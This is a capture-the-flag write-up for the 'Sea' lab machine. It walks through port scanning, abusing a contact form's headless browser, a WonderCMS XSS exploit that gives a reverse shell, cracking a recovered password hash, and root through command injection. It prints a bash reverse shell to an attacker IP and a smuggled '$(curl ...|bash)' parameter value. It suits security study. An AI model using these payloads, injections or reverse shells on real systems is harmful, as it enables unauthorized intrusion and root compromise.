Target

• IP: 10.129.62.220

Recon

sudo nmap -sC -sV 10.129.62.220 -p- -v -T5

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_  256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Sea - Home
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add sea.htb to /etc/hosts.

Browser callback from contact form

Start netcat listener:

nc -vlnp 80

Go to http://sea.htb/contact.php. In the form, set the website URL to your attacker host. Send request and intercept with Burp. Forward to Repeater.

On netcat we get:

GET / HTTP/1.1
Host: 10.10.14.49
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.5938.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate

So a browser visits the URL we submit.

We can execute JavaScript in that browser to scan localhost (127.0.0.1) for listening ports. See attachments:

• attachments/test.html
• attachments/test.py

Start web server:

python3 -m http.server 80

Start receiver script:

python3 attachments/test.py

In the contact form, set website to:

http://10.10.14.49/test.html

Send request and wait. Python server output:

10.129.62.220 - - [14/Aug/2024 15:29:45] "POST / HTTP/1.1" 200 -
b'{"port":80,"response":{}}'
10.129.62.220 - - [14/Aug/2024 15:29:45] "POST / HTTP/1.1" 200 -
b'{"port":8080,"response":{}}'
10.129.62.220 - - [14/Aug/2024 15:29:45] "POST / HTTP/1.1" 200 -

Port 8080 is open. With mode: 'no-cors', we cannot read response body.

WonderCMS exploit path

gobuster dir -u http://sea.htb/ -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -x php

We notice themes.

gobuster dir -u http://sea.htb/themes -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -x php

We notice bike.

Go to http://sea.htb/themes/bike/README.md:

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.

There is a WonderCMS exploit:

• https://github.com/prodigiousMind/CVE-2023-41425

Run PoC:

python3 exploit.py http://sea.htb 10.10.14.49 4444

In the contact form, set website to:

http://10.10.14.49:8000/xss.js

Wait until victim browser loads xss.js.

Start listener:

nc -vlnp 4444

Browse to:

http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.49&lport=4444

We get reverse shell.

There are users amay and geo.

Credential recovery and SSH

cd /var/www/sea
cat database.js

We notice:

"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q"

WonderCMS uses PHP password_hash. Remove \ from hash and save to hash file.

hashcat -a 0 -m 3200 ./hash ./rockyou.txt

$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance

ssh amay@sea.htb

Use the password found above.

ssh amay@sea.htb -NL 5555:localhost:8080

Open http://127.0.0.1:5555. It asks for username/password. Use:

• username: amay
• password: mychemicalromance

Root via command injection

Create file rev with content:

bash -i >& /dev/tcp/10.10.14.49/4444 0>&1

Start server and listener:

python3 -m http.server 80
nc -vlnp 4444

Click Analyze, intercept request with Burp, send to Repeater. Change log_file parameter to:

$(curl http://10.10.14.49/rev|bash)

We get reverse shell as root, but shell exits quickly. We can still retrieve root flag by changing log_file to:

$(cp /root/root.txt /tmp; chmod 777 /tmp/root.txt)

In amay shell:

cat /tmp/root.txt